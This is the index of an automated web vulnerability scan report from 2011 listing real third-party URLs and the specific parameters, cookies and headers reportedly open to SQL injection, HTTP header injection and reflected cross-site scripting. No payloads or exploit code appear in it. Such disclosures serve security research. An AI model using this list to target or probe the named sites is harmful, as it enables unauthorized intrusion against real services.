XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10050211-05

Report generated by XSS.CX at Wed Oct 05 16:43:28 CDT 2011.


1. SQL injection

1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals [id cookie]

1.2. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital [name of an arbitrarily supplied request parameter]

1.3. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s37146793666761 [REST URL parameter 2]

1.4. http://theplatform.com/ [Referer HTTP header]

1.5. http://theplatform.com/ [ReleaseDeliveryTime cookie]

1.6. http://theplatform.com/ [ReleasePID cookie]

1.7. http://theplatform.com/ [__utma cookie]

1.8. http://theplatform.com/ [__utmb cookie]

1.9. http://theplatform.com/ [__utmz cookie]

1.10. http://theplatform.com/ [exp_last_activity cookie]

1.11. http://theplatform.com/ [exp_last_visit cookie]

1.12. http://theplatform.com/ [exp_tracker cookie]

1.13. http://theplatform.com/ [keywords parameter]

1.14. http://theplatform.com/ [site_id parameter]

1.15. http://theplatform.com/ [where parameter]

1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.23. http://unionsquareventures.disqus.com/thread.js [sessionid cookie]

1.24. http://www.mongodb.org/dosearchsite.action [queryString parameter]

1.25. http://www.mongodb.org/images/border/border_bottom.gif [REST URL parameter 1]

1.26. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 7]

1.27. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 8]

1.28. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 7]

1.29. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 8]

1.30. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 5]

1.31. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 7]

1.32. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 8]

1.33. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 7]

1.34. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 8]

1.35. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 7]

1.36. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 8]

1.37. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 7]

1.38. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 8]

1.39. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 7]

1.40. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 8]

1.41. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 7]

1.42. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 8]

1.43. http://www.mongodb.org/s/1627/3/136/_/styles/colors.css [spaceKey parameter]

1.44. http://www.mongodb.org/s/1627/3/136/_/styles/combined.css [spaceKey parameter]

1.45. http://www.mongodb.org/s/1627/3/136/_/styles/custom.css [spaceKey parameter]

1.46. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [name of an arbitrarily supplied request parameter]

1.47. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [spaceKey parameter]

1.48. http://www.mongodb.org/s/1627/3/3/_/styles/custom.css [spaceKey parameter]

1.49. http://www.mongodb.org/s/1627/3/4/_/styles/combined.css [spaceKey parameter]

1.50. http://www.mongodb.org/s/1627/3/5/_/styles/combined.css [spaceKey parameter]

1.51. http://www.mongodb.org/s/1627/3/6/_/styles/combined.css [spaceKey parameter]

1.52. http://www.mongodb.org/s/1627/3/6/_/styles/custom.css [spaceKey parameter]

1.53. http://www.skillshare.com/data/0/0/1/12/nyc [REST URL parameter 3]

2. HTTP header injection

2.1. http://dw.com.com/clear/c.gif [REST URL parameter 2]

2.2. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [dcmt parameter]

2.3. https://signon.telstra.com/login [noFormURL parameter]

3. Cross-site scripting (reflected)

3.1. http://ad.adlegend.com/jscript [@CPSC@ parameter]

3.2. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]

3.3. http://ad.adlegend.com/jscript [target parameter]

3.4. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

3.5. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

3.6. http://ads.pointroll.com/PortalServe/ [dom parameter]

3.7. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.8. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.9. http://ads.pointroll.com/PortalServe/ [time parameter]

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.14. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com.json [callback parameter]

3.15. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json [callback parameter]

3.16. http://ar.voicefive.com/b/rc.pli [func parameter]

3.17. http://as.chango.com/links/adunit/1.31784957539e+12 [adpos parameter]

3.18. http://as.chango.com/links/adunit/1.31784957539e+12 [atype parameter]

3.19. http://as.chango.com/links/adunit/1.31784957539e+12 [bidder parameter]

3.20. http://as.chango.com/links/adunit/1.31784957539e+12 [datc parameter]

3.21. http://as.chango.com/links/adunit/1.31784957539e+12 [dc parameter]

3.22. http://as.chango.com/links/adunit/1.31784957539e+12 [dom parameter]

3.23. http://as.chango.com/links/adunit/1.31784957539e+12 [eid parameter]

3.24. http://as.chango.com/links/adunit/1.31784957539e+12 [ht parameter]

3.25. http://as.chango.com/links/adunit/1.31784957539e+12 [ibs parameter]

3.26. http://as.chango.com/links/adunit/1.31784957539e+12 [poo parameter]

3.27. http://as.chango.com/links/adunit/1.31784957539e+12 [sid parameter]

3.28. http://as.chango.com/links/adunit/1.31784957539e+12 [sig parameter]

3.29. http://as.chango.com/links/adunit/1.31784957539e+12 [st parameter]

3.30. http://as.chango.com/links/adunit/1.31784957539e+12 [stid parameter]

3.31. http://as.chango.com/links/adunit/1.31784957539e+12 [url parameter]

3.32. http://as.chango.com/links/adunit/1.31784957539e+12 [wh parameter]

3.33. http://as.chango.com/links/adunit/1.31784959608e+12 [adpos parameter]

3.34. http://as.chango.com/links/adunit/1.31784959608e+12 [atype parameter]

3.35. http://as.chango.com/links/adunit/1.31784959608e+12 [bidder parameter]

3.36. http://as.chango.com/links/adunit/1.31784959608e+12 [datc parameter]

3.37. http://as.chango.com/links/adunit/1.31784959608e+12 [dc parameter]

3.38. http://as.chango.com/links/adunit/1.31784959608e+12 [dom parameter]

3.39. http://as.chango.com/links/adunit/1.31784959608e+12 [eid parameter]

3.40. http://as.chango.com/links/adunit/1.31784959608e+12 [ht parameter]

3.41. http://as.chango.com/links/adunit/1.31784959608e+12 [ibs parameter]

3.42. http://as.chango.com/links/adunit/1.31784959608e+12 [poo parameter]

3.43. http://as.chango.com/links/adunit/1.31784959608e+12 [sid parameter]

3.44. http://as.chango.com/links/adunit/1.31784959608e+12 [sig parameter]

3.45. http://as.chango.com/links/adunit/1.31784959608e+12 [st parameter]

3.46. http://as.chango.com/links/adunit/1.31784959608e+12 [stid parameter]

3.47. http://as.chango.com/links/adunit/1.31784959608e+12 [url parameter]

3.48. http://as.chango.com/links/adunit/1.31784959608e+12 [wh parameter]

3.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.57. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/bootstrap/1872433 [max_followers parameter]

3.58. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [callback parameter]

3.59. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [site_id parameter]

3.60. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [url parameter]

3.61. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.62. http://cc.wsj.net/cdssvco/file/v2/Files [absolutePath parameter]

3.63. http://cc.wsj.net/cdssvco/file/v2/Files [c parameter]

3.64. http://cdn.krxd.net/config/ [site parameter]

3.65. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 1]

3.66. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 2]

3.67. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 3]

3.68. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 4]

3.69. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 5]

3.70. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 6]

3.71. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 1]

3.72. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 2]

3.73. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 3]

3.74. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 4]

3.75. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 5]

3.76. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 6]

3.77. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 1]

3.78. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 2]

3.79. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 3]

3.80. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 4]

3.81. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 5]

3.82. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 6]

3.83. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 1]

3.84. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 2]

3.85. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 3]

3.86. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 4]

3.87. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]

3.88. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]

3.89. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]

3.90. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]

3.91. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]

3.92. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]

3.93. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]

3.94. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]

3.95. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]

3.96. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]

3.97. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]

3.98. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]

3.99. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]

3.100. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]

3.101. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]

3.102. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]

3.103. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]

3.104. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]

3.105. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]

3.106. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]

3.107. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]

3.108. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]

3.109. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]

3.110. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]

3.111. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]

3.112. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]

3.113. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]

3.114. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]

3.115. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]

3.116. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]

3.117. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]

3.118. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]

3.119. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]

3.120. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]

3.121. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]

3.122. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]

3.123. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]

3.124. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]

3.125. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]

3.126. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]

3.127. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]

3.128. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]

3.129. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]

3.130. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]

3.131. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]

3.132. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]

3.133. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]

3.134. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]

3.135. http://content.usv.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]

3.136. http://content.usv.com/decor/javascript/magnify_stats.js [REST URL parameter 1]

3.137. http://content.usv.com/decor/javascript/magnify_twitter_feed.js [REST URL parameter 1]

3.138. http://content.usv.com/decor/track/dot.gif [REST URL parameter 1]

3.139. http://content.usv.com/pages/10gen [REST URL parameter 1]

3.140. http://content.usv.com/pages/10gen [REST URL parameter 1]

3.141. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]

3.142. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]

3.143. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]

3.144. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]

3.145. http://content.usv.com/pages/bug-labs [REST URL parameter 1]

3.146. http://content.usv.com/pages/bug-labs [REST URL parameter 1]

3.147. http://content.usv.com/pages/canvas [REST URL parameter 1]

3.148. http://content.usv.com/pages/canvas [REST URL parameter 1]

3.149. http://content.usv.com/pages/covestor [REST URL parameter 1]

3.150. http://content.usv.com/pages/covestor [REST URL parameter 1]

3.151. http://content.usv.com/pages/gary-chou [REST URL parameter 1]

3.152. http://content.usv.com/pages/gary-chou [REST URL parameter 1]

3.153. http://content.usv.com/pages/hashable [REST URL parameter 1]

3.154. http://content.usv.com/pages/hashable [REST URL parameter 1]

3.155. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]

3.156. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]

3.157. http://content.usv.com/pages/skillshare [REST URL parameter 1]

3.158. http://content.usv.com/pages/skillshare [REST URL parameter 1]

3.159. http://content.usv.com/pages/soundcloud [REST URL parameter 1]

3.160. http://content.usv.com/pages/soundcloud [REST URL parameter 1]

3.161. http://crowdsupport.telstra.com/t5/forums/forumpage.twitterstreamtaplet:getnewtweets [renderedScripts parameter]

3.162. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 1]

3.163. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 2]

3.164. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]

3.165. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]

3.166. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]

3.167. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]

3.168. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]

3.169. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]

3.170. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]

3.171. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]

3.172. http://installer.mpx.theplatform.com/installers/mpxUploader.air [REST URL parameter 2]

3.173. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [REST URL parameter 3]

3.174. http://js.revsci.net/gateway/gw.js [csid parameter]

3.175. http://link.theplatform.com/favicon.ico [REST URL parameter 1]

3.176. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [REST URL parameter 1]

3.177. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [format parameter]

3.178. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [height parameter]

3.179. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [width parameter]

3.180. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b/tracker.log [REST URL parameter 1]

3.181. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]

3.182. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]

3.183. http://mads.cbs.com/mac-ad [BRAND parameter]

3.184. http://mads.cbs.com/mac-ad [BRAND parameter]

3.185. http://mads.cbs.com/mac-ad [BRAND parameter]

3.186. http://mads.cbs.com/mac-ad [BRAND parameter]

3.187. http://mads.cbs.com/mac-ad [CELT parameter]

3.188. http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter]

3.189. http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter]

3.190. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

3.191. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

3.192. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

3.193. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

3.194. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

3.195. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

3.196. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.197. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.198. http://mads.cbs.com/mac-ad [IREFER_HOST parameter]

3.199. http://mads.cbs.com/mac-ad [IREFER_HOST parameter]

3.200. http://mads.cbs.com/mac-ad [META&ADSEPARATOR parameter]

3.201. http://mads.cbs.com/mac-ad [NCAT parameter]

3.202. http://mads.cbs.com/mac-ad [NCAT parameter]

3.203. http://mads.cbs.com/mac-ad [NODE parameter]

3.204. http://mads.cbs.com/mac-ad [NODE parameter]

3.205. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

3.206. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

3.207. http://mads.cbs.com/mac-ad [POS parameter]

3.208. http://mads.cbs.com/mac-ad [PTYPE parameter]

3.209. http://mads.cbs.com/mac-ad [PTYPE parameter]

3.210. http://mads.cbs.com/mac-ad [SITE parameter]

3.211. http://mads.cbs.com/mac-ad [cookiesOn parameter]

3.212. http://mads.cbs.com/mac-ad [cookiesOn parameter]

3.213. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

3.214. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

3.215. http://mads.cbs.com/mac-ad [x-cb parameter]

3.216. http://mads.cbs.com/mac-ad [x-cb parameter]

3.217. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

3.218. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

3.219. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.220. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.221. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.222. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.223. http://mads.cbsnews.com/mac-ad [CELT parameter]

3.224. http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]

3.225. http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]

3.226. http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]

3.227. http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]

3.228. http://mads.cbsnews.com/mac-ad [DVAR_EXCLUDE parameter]

3.229. http://mads.cbsnews.com/mac-ad [DVAR_EXCLUDE parameter]

3.230. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

3.231. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

3.232. http://mads.cbsnews.com/mac-ad [DVAR_SESSION parameter]

3.233. http://mads.cbsnews.com/mac-ad [DVAR_SESSION parameter]

3.234. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.235. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.236. http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]

3.237. http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]

3.238. http://mads.cbsnews.com/mac-ad [NCAT parameter]

3.239. http://mads.cbsnews.com/mac-ad [NCAT parameter]

3.240. http://mads.cbsnews.com/mac-ad [NODE parameter]

3.241. http://mads.cbsnews.com/mac-ad [NODE parameter]

3.242. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.243. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.244. http://mads.cbsnews.com/mac-ad [POS parameter]

3.245. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

3.246. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

3.247. http://mads.cbsnews.com/mac-ad [SITE parameter]

3.248. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

3.249. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

3.250. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

3.251. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

3.252. http://mads.cbsnews.com/mac-ad [x-cb parameter]

3.253. http://mads.cbsnews.com/mac-ad [x-cb parameter]

3.254. http://mads.cnet.com/mac-ad [&adfile parameter]

3.255. http://mads.cnet.com/mac-ad [BRAND parameter]

3.256. http://mads.cnet.com/mac-ad [BRAND parameter]

3.257. http://mads.cnet.com/mac-ad [CELT parameter]

3.258. http://mads.cnet.com/mac-ad [SITE parameter]

3.259. http://mads.cnet.com/mac-ad [SITE parameter]

3.260. http://mads.cnet.com/mac-ad [_RGROUP parameter]

3.261. https://manage.theplatform.com/remoteLogin.gsp [targetel parameter]

3.262. http://newyork.cbslocal.us.intellitxt.com/al.asp [jscallback parameter]

3.263. http://newyork.cbslocal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.264. http://newyork.cbslocal.us.intellitxt.com/v4/init [jscallback parameter]

3.265. http://newyork.cbslocal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.266. http://offers.cbslocal.com/widget/city/New-York/deals_blue/javascript/local-deals-0 [REST URL parameter 6]

3.267. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.268. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.269. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.270. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.271. https://portal.scanscout.com/ssframework/userSessionController.htm [login parameter]

3.272. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

3.273. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

3.274. http://proto16.tt.omtrdc.net/m2/proto16/mbox/standard [mbox parameter]

3.275. http://r.skimresources.com/api/ [callback parameter]

3.276. http://release.theplatform.com/content.select [REST URL parameter 1]

3.277. http://release.theplatform.com/content.select [REST URL parameter 1]

3.278. http://release.theplatform.com/content.select [REST URL parameter 1]

3.279. http://release.theplatform.com/content.select [REST URL parameter 1]

3.280. http://release.theplatform.com/crossdomain.xml [REST URL parameter 1]

3.281. http://release.theplatform.com/favicon.ico [REST URL parameter 1]

3.282. http://release.theplatform.com/favicon.ico [REST URL parameter 1]

3.283. http://s15.sitemeter.com/js/counter.asp [site parameter]

3.284. http://s15.sitemeter.com/js/counter.js [site parameter]

3.285. http://s20.sitemeter.com/js/counter.asp [site parameter]

3.286. http://s20.sitemeter.com/js/counter.js [site parameter]

3.287. http://s23.sitemeter.com/js/counter.asp [site parameter]

3.288. http://s23.sitemeter.com/js/counter.js [site parameter]

3.289. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

3.290. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

3.291. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

3.292. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [api_key parameter]

3.293. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [name of an arbitrarily supplied request parameter]

3.294. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [target_url parameter]

